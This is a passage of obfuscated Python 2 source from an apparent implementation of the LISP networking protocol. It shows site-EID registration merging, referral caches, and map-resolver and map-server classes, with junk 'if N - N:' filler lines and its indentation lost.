if 81 - 81: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii / OOooOOo / iII111i
if ( child != None ) :
self . copy_state_to_parent ( child )
self . map_registers_received += 1
if 34 - 34: i11iIiiIii - o0oOOo0O0Ooo * OoooooooOO * I1ii11iIi11i * Oo0Ooo % I1ii11iIi11i
return ( i111i11I )
if 31 - 31: I11i . o0oOOo0O0Ooo
if 82 - 82: I11i - Oo0Ooo
def copy_rloc_records ( self ) :
Oo0OOoO = [ ]
for o0oO0O00 in self . registered_rlocs :
Oo0OOoO . append ( copy . deepcopy ( o0oO0O00 ) )
if 80 - 80: oO0o % I1ii11iIi11i * I1Ii111 + i1IIi
return ( Oo0OOoO )
if 79 - 79: oO0o + IiII
if 4 - 4: iII111i + OoooooooOO / I1Ii111
def merge_rlocs_in_site_eid ( self ) :
self . registered_rlocs = [ ]
for oOOOO0ooo in self . individual_registrations . values ( ) :
if ( self . site_id != oOOOO0ooo . site_id ) : continue
if ( oOOOO0ooo . registered == False ) : continue
self . registered_rlocs += oOOOO0ooo . copy_rloc_records ( )
if 57 - 57: I1IiiI . iIii1I11I1II1 % iII111i * iII111i / I1Ii111
if 30 - 30: O0 / I11i % OoOoOO00 * I1Ii111 / O0 % ooOoO0o
if 36 - 36: iIii1I11I1II1 . iII111i * I1IiiI . I1IiiI - IiII
if 39 - 39: O0 / ooOoO0o + I11i - OoOoOO00 * o0oOOo0O0Ooo - OoO0O00
if 97 - 97: i11iIiiIii / O0 % OoO0O00
if 88 - 88: i1IIi . I1IiiI
Oo0OOoO = [ ]
for o0oO0O00 in self . registered_rlocs :
if ( o0oO0O00 . rloc . is_null ( ) or len ( Oo0OOoO ) == 0 ) :
Oo0OOoO . append ( o0oO0O00 )
continue
if 8 - 8: I1ii11iIi11i . OoO0O00 % o0oOOo0O0Ooo / O0
for OO00000 in Oo0OOoO :
if ( OO00000 . rloc . is_null ( ) ) : continue
if ( o0oO0O00 . rloc . is_exact_match ( OO00000 . rloc ) ) : break
if 59 - 59: I1ii11iIi11i % OoO0O00 . i1IIi / I1ii11iIi11i
if ( OO00000 == Oo0OOoO [ - 1 ] ) : Oo0OOoO . append ( o0oO0O00 )
if 44 - 44: o0oOOo0O0Ooo % o0oOOo0O0Ooo % oO0o
self . registered_rlocs = Oo0OOoO
if 76 - 76: ooOoO0o / iII111i
if 29 - 29: OOooOOo / OoooooooOO % II111iiii
if 68 - 68: iIii1I11I1II1 * iII111i % o0oOOo0O0Ooo
if 45 - 45: OoooooooOO
if ( len ( self . registered_rlocs ) == 0 ) : self . registered = False
return
if 45 - 45: iIii1I11I1II1
if 11 - 11: Ii1I * OoO0O00 % I1ii11iIi11i
def merge_rles_in_site_eid ( self ) :
if 60 - 60: i11iIiiIii % II111iiii % I11i
if 92 - 92: O0 * OoooooooOO + I1ii11iIi11i / IiII
if 97 - 97: o0oOOo0O0Ooo . Ii1I + I1Ii111
if 72 - 72: i11iIiiIii . iII111i . Ii1I * I1ii11iIi11i
II1iI111 = { }
for o0oO0O00 in self . registered_rlocs :
if ( o0oO0O00 . rle == None ) : continue
for IiioOoo in o0oO0O00 . rle . rle_nodes :
o0o00O0oOooO0 = IiioOoo . address . print_address_no_iid ( )
II1iI111 [ o0o00O0oOooO0 ] = IiioOoo . address
if 69 - 69: I1ii11iIi11i % I1Ii111 / OoooooooOO % oO0o
break
if 4 - 4: OoOoOO00 * i11iIiiIii - OoOoOO00 * o0oOOo0O0Ooo % I1ii11iIi11i
if 19 - 19: OOooOOo
if 73 - 73: ooOoO0o / O0 / I1Ii111 . OoooooooOO
if 88 - 88: OoooooooOO - oO0o
if 80 - 80: ooOoO0o
self . merge_rlocs_in_site_eid ( )
if 38 - 38: IiII + OoO0O00 * I11i * iIii1I11I1II1 * oO0o
if 74 - 74: I1IiiI
if 39 - 39: iII111i * IiII / iII111i * IiII % I1ii11iIi11i
if 27 - 27: iIii1I11I1II1 . ooOoO0o
if 74 - 74: i1IIi % OoOoOO00
if 98 - 98: IiII * OOooOOo / O0 - I1Ii111 . I1Ii111 + OOooOOo
if 61 - 61: iII111i * Ii1I % Ii1I + I1IiiI
if 23 - 23: oO0o + I1Ii111 / OoooooooOO / O0 + IiII
OoOoooOoO = [ ]
for o0oO0O00 in self . registered_rlocs :
if ( self . registered_rlocs . index ( o0oO0O00 ) == 0 ) :
OoOoooOoO . append ( o0oO0O00 )
continue
if 100 - 100: Ii1I
if ( o0oO0O00 . rle == None ) : OoOoooOoO . append ( o0oO0O00 )
if 73 - 73: IiII - O0
self . registered_rlocs = OoOoooOoO
if 54 - 54: OOooOOo
if 28 - 28: i1IIi - Oo0Ooo * OoO0O00 + OoooooooOO - Ii1I * i11iIiiIii
if 71 - 71: iII111i - OOooOOo / iIii1I11I1II1 % i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo
if 32 - 32: iIii1I11I1II1 . II111iiii / IiII % O0 / iII111i
if 97 - 97: iIii1I11I1II1
if 18 - 18: OOooOOo
iI1Ii11 = lisp_rle ( "" )
Ooooo000 = { }
IIiiI11iI = None
for oOOOO0ooo in self . individual_registrations . values ( ) :
if ( oOOOO0ooo . registered == False ) : continue
Ii1i1Ii1I = oOOOO0ooo . registered_rlocs [ 0 ] . rle
if ( Ii1i1Ii1I == None ) : continue
if 32 - 32: II111iiii . I1Ii111
IIiiI11iI = oOOOO0ooo . registered_rlocs [ 0 ] . rloc_name
for o0oOooo in Ii1i1Ii1I . rle_nodes :
o0o00O0oOooO0 = o0oOooo . address . print_address_no_iid ( )
if ( Ooooo000 . has_key ( o0o00O0oOooO0 ) ) : break
if 48 - 48: Ii1I * IiII % O0 - II111iiii
IiioOoo = lisp_rle_node ( )
IiioOoo . address . copy_address ( o0oOooo . address )
IiioOoo . level = o0oOooo . level
IiioOoo . rloc_name = IIiiI11iI
iI1Ii11 . rle_nodes . append ( IiioOoo )
Ooooo000 [ o0o00O0oOooO0 ] = o0oOooo . address
if 66 - 66: iIii1I11I1II1 / OOooOOo
if 65 - 65: IiII . oO0o + O0 - i11iIiiIii + iIii1I11I1II1
if 82 - 82: iIii1I11I1II1 * iII111i + iIii1I11I1II1 / OoO0O00 + O0
if 67 - 67: I1Ii111
if 94 - 94: I1Ii111 % iIii1I11I1II1 - II111iiii . ooOoO0o + i11iIiiIii - i11iIiiIii
if 55 - 55: OoooooooOO % iIii1I11I1II1 % I1ii11iIi11i % i1IIi
if ( len ( iI1Ii11 . rle_nodes ) == 0 ) : iI1Ii11 = None
if ( len ( self . registered_rlocs ) != 0 ) :
self . registered_rlocs [ 0 ] . rle = iI1Ii11
if ( IIiiI11iI ) : self . registered_rlocs [ 0 ] . rloc_name = None
if 46 - 46: I11i - ooOoO0o . I1IiiI
if 36 - 36: I11i + OoO0O00 * O0 * OoOoOO00 * iII111i
if 90 - 90: i11iIiiIii / i1IIi
if 35 - 35: Ii1I . I11i / oO0o / OoOoOO00
if 5 - 5: I1ii11iIi11i . o0oOOo0O0Ooo * iII111i * I1ii11iIi11i % I1Ii111
if ( II1iI111 . keys ( ) == Ooooo000 . keys ( ) ) : return ( False )
if 83 - 83: iIii1I11I1II1 * o0oOOo0O0Ooo % i11iIiiIii + OoO0O00 . O0
lprint ( "{} {} from {} to {}" . format ( green ( self . print_eid_tuple ( ) , False ) , bold ( "RLE change" , False ) ,
# o0oOOo0O0Ooo % OOooOOo / Ii1I . iIii1I11I1II1 % o0oOOo0O0Ooo + o0oOOo0O0Ooo
II1iI111 . keys ( ) , Ooooo000 . keys ( ) ) )
if 63 - 63: i11iIiiIii
return ( True )
if 34 - 34: OoooooooOO - O0 + ooOoO0o * I1IiiI
if 75 - 75: OOooOOo % iII111i
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . add_cache ( self . eid , self )
else :
iIiIi1I = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( iIiIi1I == None ) :
iIiIi1I = lisp_site_eid ( self . site )
iIiIi1I . eid . copy_address ( self . group )
iIiIi1I . group . copy_address ( self . group )
lisp_sites_by_eid . add_cache ( self . group , iIiIi1I )
if 15 - 15: OoO0O00
if 52 - 52: II111iiii / ooOoO0o
if 23 - 23: i11iIiiIii % OoO0O00 - o0oOOo0O0Ooo + OoooooooOO
if 12 - 12: Ii1I / I1IiiI . oO0o . I1IiiI + ooOoO0o - II111iiii
if 6 - 6: Oo0Ooo + Oo0Ooo - OoOoOO00 - II111iiii
iIiIi1I . parent_for_more_specifics = self . parent_for_more_specifics
if 25 - 25: i11iIiiIii + II111iiii * OOooOOo % OOooOOo
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( iIiIi1I . group )
iIiIi1I . add_source_entry ( self )
if 87 - 87: I11i % Ii1I % Oo0Ooo . II111iiii / oO0o
if 19 - 19: O0 . OOooOOo + I1Ii111 * I1ii11iIi11i
if 91 - 91: o0oOOo0O0Ooo / oO0o . o0oOOo0O0Ooo + IiII + ooOoO0o . I1Ii111
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . delete_cache ( self . eid )
else :
iIiIi1I = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( iIiIi1I == None ) : return
if 90 - 90: i1IIi + oO0o * oO0o / ooOoO0o . IiII
oOOOO0ooo = iIiIi1I . lookup_source_cache ( self . eid , True )
if ( oOOOO0ooo == None ) : return
if 98 - 98: I11i % OoO0O00 . iII111i - o0oOOo0O0Ooo
if ( iIiIi1I . source_cache == None ) : return
if 92 - 92: I11i
iIiIi1I . source_cache . delete_cache ( self . eid )
if ( iIiIi1I . source_cache . cache_size ( ) == 0 ) :
lisp_sites_by_eid . delete_cache ( self . group )
if 34 - 34: I1IiiI % iIii1I11I1II1 . I1ii11iIi11i * Oo0Ooo * iIii1I11I1II1 / O0
if 98 - 98: iII111i % IiII + OoO0O00
if 23 - 23: OOooOOo
if 83 - 83: I1ii11iIi11i / O0 * II111iiii + IiII + Oo0Ooo
def add_source_entry ( self , source_se ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_se . eid , source_se )
if 99 - 99: II111iiii + O0
if 94 - 94: ooOoO0o * ooOoO0o + o0oOOo0O0Ooo . iII111i % iIii1I11I1II1 + Ii1I
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 88 - 88: Oo0Ooo . iII111i
if 89 - 89: OOooOOo + I1Ii111 % i11iIiiIii + Oo0Ooo / Oo0Ooo + OoO0O00
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 9 - 9: OoOoOO00 % i1IIi + IiII
if 19 - 19: I1Ii111 - II111iiii / I1Ii111 + I1IiiI - OoooooooOO + o0oOOo0O0Ooo
def eid_record_matches ( self , eid_record ) :
if ( self . eid . is_exact_match ( eid_record . eid ) == False ) : return ( False )
if ( eid_record . group . is_null ( ) ) : return ( True )
return ( eid_record . group . is_exact_match ( self . group ) )
if 100 - 100: OoO0O00 / OoOoOO00 / OOooOOo / OoO0O00
if 95 - 95: ooOoO0o
def inherit_from_ams_parent ( self ) :
O0Ii1IiiiI = self . parent_for_more_specifics
if ( O0Ii1IiiiI == None ) : return
self . force_proxy_reply = O0Ii1IiiiI . force_proxy_reply
self . force_nat_proxy_reply = O0Ii1IiiiI . force_nat_proxy_reply
self . force_ttl = O0Ii1IiiiI . force_ttl
self . pitr_proxy_reply_drop = O0Ii1IiiiI . pitr_proxy_reply_drop
self . proxy_reply_action = O0Ii1IiiiI . proxy_reply_action
self . echo_nonce_capable = O0Ii1IiiiI . echo_nonce_capable
self . policy = O0Ii1IiiiI . policy
self . require_signature = O0Ii1IiiiI . require_signature
self . encrypt_json = O0Ii1IiiiI . encrypt_json
if 95 - 95: Ii1I + i1IIi . I1IiiI % I1Ii111 / Ii1I * O0
if 68 - 68: I1Ii111 - IiII - oO0o - Oo0Ooo - o0oOOo0O0Ooo
def rtrs_in_rloc_set ( self ) :
for o0oO0O00 in self . registered_rlocs :
if ( o0oO0O00 . is_rtr ( ) ) : return ( True )
if 32 - 32: OoOoOO00 % i11iIiiIii
return ( False )
if 53 - 53: I1Ii111 * Ii1I / IiII . i1IIi * II111iiii / o0oOOo0O0Ooo
if 44 - 44: I1Ii111 + ooOoO0o
def is_rtr_in_rloc_set ( self , rtr_rloc ) :
for o0oO0O00 in self . registered_rlocs :
if ( o0oO0O00 . rloc . is_exact_match ( rtr_rloc ) == False ) : continue
if ( o0oO0O00 . is_rtr ( ) ) : return ( True )
if 15 - 15: I11i + OoO0O00 + OoOoOO00
return ( False )
if 100 - 100: I1Ii111
if 78 - 78: OoOoOO00
def is_rloc_in_rloc_set ( self , rloc ) :
for o0oO0O00 in self . registered_rlocs :
if ( o0oO0O00 . rle ) :
for iI1Ii11 in o0oO0O00 . rle . rle_nodes :
if ( iI1Ii11 . address . is_exact_match ( rloc ) ) : return ( True )
if 16 - 16: I1Ii111 % OoO0O00 - OoO0O00 % OoOoOO00 * OoO0O00
if 36 - 36: OoOoOO00 * II111iiii . OoooooooOO * I11i . I11i
if ( o0oO0O00 . rloc . is_exact_match ( rloc ) ) : return ( True )
if 13 - 13: I1ii11iIi11i * II111iiii
return ( False )
if 93 - 93: OOooOOo / O0 - o0oOOo0O0Ooo + OoO0O00 * I1IiiI
if 53 - 53: I1ii11iIi11i
def do_rloc_sets_match ( self , prev_rloc_set ) :
if ( len ( self . registered_rlocs ) != len ( prev_rloc_set ) ) : return ( False )
if 91 - 91: o0oOOo0O0Ooo - I1ii11iIi11i . i1IIi
for o0oO0O00 in prev_rloc_set :
iiII111i1i = o0oO0O00 . rloc
if ( self . is_rloc_in_rloc_set ( iiII111i1i ) == False ) : return ( False )
if 64 - 64: ooOoO0o
return ( True )
if 23 - 23: Oo0Ooo . OoO0O00
if 49 - 49: oO0o % i11iIiiIii * Ii1I
if 9 - 9: Oo0Ooo - OoO0O00 + ooOoO0o / o0oOOo0O0Ooo
class lisp_mr ( ) :
def __init__ ( self , addr_str , dns_name , mr_name ) :
self . mr_name = mr_name if ( mr_name != None ) else "all"
self . dns_name = dns_name
self . map_resolver = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( addr_str ) :
self . map_resolver . store_address ( addr_str )
self . insert_mr ( )
else :
self . resolve_dns_name ( )
if 61 - 61: O0 - i11iIiiIii * o0oOOo0O0Ooo
self . last_used = 0
self . last_reply = 0
self . last_nonce = 0
self . map_requests_sent = 0
self . neg_map_replies_received = 0
self . total_rtt = 0
if 92 - 92: Oo0Ooo + OOooOOo - i11iIiiIii
if 26 - 26: O0 % Oo0Ooo + ooOoO0o - Ii1I . Oo0Ooo
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
if 33 - 33: I1Ii111 / iII111i . I1Ii111 % II111iiii
try :
IIiiI = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
oo0Oo0O0 = IIiiI [ 2 ]
except :
return
if 49 - 49: Ii1I * OoooooooOO * i1IIi % OoOoOO00
if 83 - 83: iIii1I11I1II1 - i1IIi - Ii1I % iII111i
if 69 - 69: I1Ii111 * oO0o * I1IiiI
if 74 - 74: O0 / I11i . Oo0Ooo / I11i % OoO0O00 % o0oOOo0O0Ooo
if 83 - 83: OoO0O00 - i11iIiiIii + iIii1I11I1II1
if 52 - 52: OoooooooOO
if ( len ( oo0Oo0O0 ) <= self . a_record_index ) :
self . delete_mr ( )
return
if 44 - 44: O0 / OoooooooOO + ooOoO0o * I1ii11iIi11i
if 36 - 36: I1ii11iIi11i / OoO0O00 - oO0o % O0
o0o00O0oOooO0 = oo0Oo0O0 [ self . a_record_index ]
if ( o0o00O0oOooO0 != self . map_resolver . print_address_no_iid ( ) ) :
self . delete_mr ( )
self . map_resolver . store_address ( o0o00O0oOooO0 )
self . insert_mr ( )
if 12 - 12: i1IIi * ooOoO0o / oO0o + I1IiiI / OoooooooOO
if 86 - 86: Oo0Ooo / OoO0O00
if 78 - 78: I1IiiI * I1IiiI
if 13 - 13: oO0o
if 43 - 43: oO0o / Ii1I % OOooOOo
if 45 - 45: II111iiii
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
if 41 - 41: Ii1I / OOooOOo * Oo0Ooo . O0 - i11iIiiIii
for o0o00O0oOooO0 in oo0Oo0O0 [ 1 : : ] :
oO0OO = lisp_address ( LISP_AFI_NONE , o0o00O0oOooO0 , 0 , 0 )
oOO00O0oooo00 = lisp_get_map_resolver ( oO0OO , None )
if ( oOO00O0oooo00 != None and oOO00O0oooo00 . a_record_index == oo0Oo0O0 . index ( o0o00O0oOooO0 ) ) :
continue
if 77 - 77: o0oOOo0O0Ooo + I1IiiI + I1Ii111 / I1ii11iIi11i * i1IIi
oOO00O0oooo00 = lisp_mr ( o0o00O0oOooO0 , None , None )
oOO00O0oooo00 . a_record_index = oo0Oo0O0 . index ( o0o00O0oOooO0 )
oOO00O0oooo00 . dns_name = self . dns_name
oOO00O0oooo00 . last_dns_resolve = lisp_get_timestamp ( )
if 37 - 37: O0 + iIii1I11I1II1 % IiII * oO0o
if 43 - 43: OOooOOo . O0
if 76 - 76: OOooOOo * OoooooooOO / IiII . OoO0O00 + II111iiii
if 23 - 23: OoO0O00 - OoooooooOO * I11i . iIii1I11I1II1 / o0oOOo0O0Ooo + oO0o
if 74 - 74: II111iiii / I1IiiI * O0 * OoO0O00 . I11i
OoiIIi11 = [ ]
for oOO00O0oooo00 in lisp_map_resolvers_list . values ( ) :
if ( self . dns_name != oOO00O0oooo00 . dns_name ) : continue
oO0OO = oOO00O0oooo00 . map_resolver . print_address_no_iid ( )
if ( oO0OO in oo0Oo0O0 ) : continue
OoiIIi11 . append ( oOO00O0oooo00 )
if 98 - 98: ooOoO0o * I11i + o0oOOo0O0Ooo
for oOO00O0oooo00 in OoiIIi11 : oOO00O0oooo00 . delete_mr ( )
if 62 - 62: i11iIiiIii
if 49 - 49: o0oOOo0O0Ooo / OoOoOO00 + iII111i
def insert_mr ( self ) :
o0Oo = self . mr_name + self . map_resolver . print_address ( )
lisp_map_resolvers_list [ o0Oo ] = self
if 85 - 85: I1IiiI - o0oOOo0O0Ooo
if 86 - 86: II111iiii + Ii1I * Ii1I
def delete_mr ( self ) :
o0Oo = self . mr_name + self . map_resolver . print_address ( )
if ( lisp_map_resolvers_list . has_key ( o0Oo ) == False ) : return
lisp_map_resolvers_list . pop ( o0Oo )
if 26 - 26: o0oOOo0O0Ooo + oO0o * i11iIiiIii / II111iiii
if 86 - 86: Ii1I
if 69 - 69: oO0o % o0oOOo0O0Ooo / o0oOOo0O0Ooo
class lisp_ddt_root ( ) :
def __init__ ( self ) :
self . root_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . priority = 0
self . weight = 0
if 1 - 1: Ii1I
if 43 - 43: o0oOOo0O0Ooo
if 78 - 78: I1Ii111 % i1IIi * I11i
class lisp_referral ( ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_set = { }
self . referral_type = LISP_DDT_ACTION_NULL
self . referral_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_ttl = 0
self . uptime = lisp_get_timestamp ( )
self . expires = 0
self . source_cache = None
if 59 - 59: OoOoOO00 % OoO0O00 % i11iIiiIii . II111iiii % I1ii11iIi11i + i1IIi
if 99 - 99: I11i + IiII * I1Ii111 - OOooOOo - i1IIi
def print_referral ( self , eid_indent , referral_indent ) :
O0II1i = lisp_print_elapsed ( self . uptime )
oo00OO0o = lisp_print_future ( self . expires )
lprint ( "{}Referral EID {}, uptime/expires {}/{}, {} referrals:" . format ( eid_indent , green ( self . eid . print_prefix ( ) , False ) , O0II1i ,
# I1IiiI % iIii1I11I1II1 + o0oOOo0O0Ooo / I1Ii111
oo00OO0o , len ( self . referral_set ) ) )
if 59 - 59: OoO0O00 . I1IiiI
for iiI111I in self . referral_set . values ( ) :
iiI111I . print_ref_node ( referral_indent )
if 18 - 18: O0 - I1IiiI % Oo0Ooo * o0oOOo0O0Ooo
if 81 - 81: O0 % iII111i * I11i + iIii1I11I1II1 . OoOoOO00
if 56 - 56: I1Ii111 / iIii1I11I1II1 % I1IiiI
def print_referral_type ( self ) :
if ( self . eid . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( "root" )
if ( self . referral_type == LISP_DDT_ACTION_NULL ) :
return ( "null-referral" )
if 42 - 42: OoooooooOO + i1IIi / OoooooooOO * I1Ii111 % oO0o % OoOoOO00
if ( self . referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
return ( "no-site-action" )
if 74 - 74: OoOoOO00 / Oo0Ooo + I1Ii111
if ( self . referral_type > LISP_DDT_ACTION_MAX ) :
return ( "invalid-action" )
if 43 - 43: iIii1I11I1II1 / oO0o . II111iiii % O0 - IiII
return ( lisp_map_referral_action_string [ self . referral_type ] )
if 49 - 49: IiII - OOooOOo * OOooOOo . O0
if 60 - 60: OoOoOO00 % iIii1I11I1II1 + IiII % o0oOOo0O0Ooo
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 64 - 64: OoOoOO00 * I1ii11iIi11i . OoooooooOO . i1IIi
if 61 - 61: OoO0O00
def print_ttl ( self ) :
Oo0o0 = self . referral_ttl
if ( Oo0o0 < 60 ) : return ( str ( Oo0o0 ) + " secs" )
if 100 - 100: OoOoOO00
if ( ( Oo0o0 % 60 ) == 0 ) :
Oo0o0 = str ( Oo0o0 / 60 ) + " mins"
else :
Oo0o0 = str ( Oo0o0 ) + " secs"
if 97 - 97: OoooooooOO
return ( Oo0o0 )
if 91 - 91: o0oOOo0O0Ooo / O0 % OoO0O00
if 35 - 35: iII111i % OoO0O00 * O0
def is_referral_negative ( self ) :
return ( self . referral_type in ( LISP_DDT_ACTION_MS_NOT_REG , LISP_DDT_ACTION_DELEGATION_HOLE ,
# OOooOOo . OoO0O00 * iII111i
LISP_DDT_ACTION_NOT_AUTH ) )
if 39 - 39: I1IiiI
if 98 - 98: OoO0O00 - I1Ii111 - Oo0Ooo - Ii1I
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . add_cache ( self . eid , self )
else :
IiII111IiII1 = lisp_referral_cache . lookup_cache ( self . group , True )
if ( IiII111IiII1 == None ) :
IiII111IiII1 = lisp_referral ( )
IiII111IiII1 . eid . copy_address ( self . group )
IiII111IiII1 . group . copy_address ( self . group )
lisp_referral_cache . add_cache ( self . group , IiII111IiII1 )
if 10 - 10: OoooooooOO . I11i / I1Ii111 % i11iIiiIii % iIii1I11I1II1
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( IiII111IiII1 . group )
IiII111IiII1 . add_source_entry ( self )
if 65 - 65: IiII % OOooOOo / o0oOOo0O0Ooo * II111iiii - oO0o
if 38 - 38: I1Ii111 * o0oOOo0O0Ooo
if 32 - 32: iII111i / Ii1I / I1Ii111 - OoOoOO00 / OOooOOo * OoO0O00
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . delete_cache ( self . eid )
else :
IiII111IiII1 = lisp_referral_cache . lookup_cache ( self . group , True )
if ( IiII111IiII1 == None ) : return
if 32 - 32: I1ii11iIi11i + ooOoO0o . i1IIi * iIii1I11I1II1 - I1IiiI
o00ooOoo0000o = IiII111IiII1 . lookup_source_cache ( self . eid , True )
if ( o00ooOoo0000o == None ) : return
if 9 - 9: I11i % i1IIi / ooOoO0o % iII111i - oO0o - II111iiii
IiII111IiII1 . source_cache . delete_cache ( self . eid )
if ( IiII111IiII1 . source_cache . cache_size ( ) == 0 ) :
lisp_referral_cache . delete_cache ( self . group )
if 29 - 29: ooOoO0o . II111iiii . i1IIi % oO0o
if 11 - 11: OoOoOO00 . OoO0O00 % I11i * iII111i % I1Ii111 . O0
if 17 - 17: OOooOOo / i11iIiiIii - i11iIiiIii . II111iiii . ooOoO0o
if 38 - 38: OOooOOo . OoooooooOO . II111iiii + OoO0O00 / oO0o . OoooooooOO
def add_source_entry ( self , source_ref ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ref . eid , source_ref )
if 100 - 100: OoO0O00
if 36 - 36: oO0o + Ii1I - O0
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 19 - 19: O0 + I1Ii111 . I1Ii111 * IiII * ooOoO0o + i1IIi
if 51 - 51: ooOoO0o % OoOoOO00 % i1IIi / O0
if 11 - 11: OOooOOo . I1ii11iIi11i * OOooOOo * OoO0O00
class lisp_referral_node ( ) :
def __init__ ( self ) :
self . referral_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . priority = 0
self . weight = 0
self . updown = True
self . map_requests_sent = 0
self . no_responses = 0
self . uptime = lisp_get_timestamp ( )
if 11 - 11: I11i
if 85 - 85: OoOoOO00 - Ii1I / Oo0Ooo % I1ii11iIi11i
def print_ref_node ( self , indent ) :
i1 = lisp_print_elapsed ( self . uptime )
lprint ( "{}referral {}, uptime {}, {}, priority/weight: {}/{}" . format ( indent , red ( self . referral_address . print_address ( ) , False ) , i1 ,
# oO0o
"up" if self . updown else "down" , self . priority , self . weight ) )
if 43 - 43: o0oOOo0O0Ooo / O0
if 65 - 65: Oo0Ooo
if 8 - 8: IiII * i11iIiiIii % i11iIiiIii . I11i * I1ii11iIi11i . II111iiii
class lisp_ms ( ) :
def __init__ ( self , addr_str , dns_name , ms_name , alg_id , key_id , pw , pr ,
mr , rr , wmn , site_id , ekey_id , ekey ) :
self . ms_name = ms_name if ( ms_name != None ) else "all"
self . dns_name = dns_name
self . map_server = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( lisp_map_servers_list == { } ) :
self . xtr_id = lisp_get_control_nonce ( )
else :
self . xtr_id = lisp_map_servers_list . values ( ) [ 0 ] . xtr_id
if 44 - 44: I1IiiI + I1ii11iIi11i
self . alg_id = alg_id
self . key_id = key_id
self . password = pw
self . proxy_reply = pr
self . merge_registrations = mr
self . refresh_registrations = rr
self . want_map_notify = wmn
self . site_id = site_id
self . map_registers_sent = 0
self . map_registers_multicast_sent = 0
self . map_notifies_received = 0
self . map_notify_acks_sent = 0
self . ekey_id = ekey_id
self . ekey = ekey
if ( addr_str ) :
self . map_server . store_address ( addr_str )
self . insert_ms ( )
else :
self . resolve_dns_name ( )
if 81 - 81: i11iIiiIii + o0oOOo0O0Ooo
if 42 - 42: ooOoO0o . i1IIi + iIii1I11I1II1 . oO0o * OoOoOO00 / ooOoO0o
if 20 - 20: I1Ii111 + IiII . i11iIiiIii / iIii1I11I1II1 . I11i % IiII
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
if 91 - 91: ooOoO0o * Oo0Ooo . i1IIi . ooOoO0o . ooOoO0o
try :
IIiiI = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
oo0Oo0O0 = IIiiI [ 2 ]
except :
return
if 24 - 24: iIii1I11I1II1
if 72 - 72: i11iIiiIii + o0oOOo0O0Ooo % ooOoO0o * I1ii11iIi11i . i1IIi
if 59 - 59: OoooooooOO - OoooooooOO - o0oOOo0O0Ooo + i1IIi % I1Ii111
if 74 - 74: IiII * iIii1I11I1II1 - I1IiiI
if 62 - 62: o0oOOo0O0Ooo
if 54 - 54: iIii1I11I1II1 / OoooooooOO + o0oOOo0O0Ooo . i1IIi - OoooooooOO
if ( len ( oo0Oo0O0 ) <= self . a_record_index ) :
self . delete_ms ( )
return
if 70 - 70: Ii1I / OoOoOO00 * Oo0Ooo
if 32 - 32: I1Ii111 . OoOoOO00 % OoooooooOO + I1Ii111 * OoO0O00
o0o00O0oOooO0 = oo0Oo0O0 [ self . a_record_index ]
if ( o0o00O0oOooO0 != self . map_server . print_address_no_iid ( ) ) :
self . delete_ms ( )
self . map_server . store_address ( o0o00O0oOooO0 )
self . insert_ms ( )
if 84 - 84: OoOoOO00
if 80 - 80: oO0o
if 59 - 59: iIii1I11I1II1 / IiII % I1ii11iIi11i + OoO0O00 - I11i % OOooOOo
if 92 - 92: iII111i
if 96 - 96: OoOoOO00 / OoOoOO00 / OoOoOO00 + OoooooooOO + Oo0Ooo
if 91 - 91: OoOoOO00 + II111iiii / I11i * iIii1I11I1II1
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
if 92 - 92: I1Ii111 - IiII / IiII
for o0o00O0oOooO0 in oo0Oo0O0 [ 1 : : ] :
oO0OO = lisp_address ( LISP_AFI_NONE , o0o00O0oOooO0 , 0 , 0 )
ii1i = lisp_get_map_server ( oO0OO )
if ( ii1i != None and ii1i . a_record_index == oo0Oo0O0 . index ( o0o00O0oOooO0 ) ) :
continue
if 42 - 42: IiII
ii1i = copy . deepcopy ( self )
ii1i . map_server . store_address ( o0o00O0oOooO0 )
ii1i . a_record_index = oo0Oo0O0 . index ( o0o00O0oOooO0 )
ii1i . last_dns_resolve = lisp_get_timestamp ( )
ii1i . insert_ms ( )
if 7 - 7: iIii1I11I1II1
if 35 - 35: IiII + O0 % I1Ii111 - I1ii11iIi11i - i1IIi
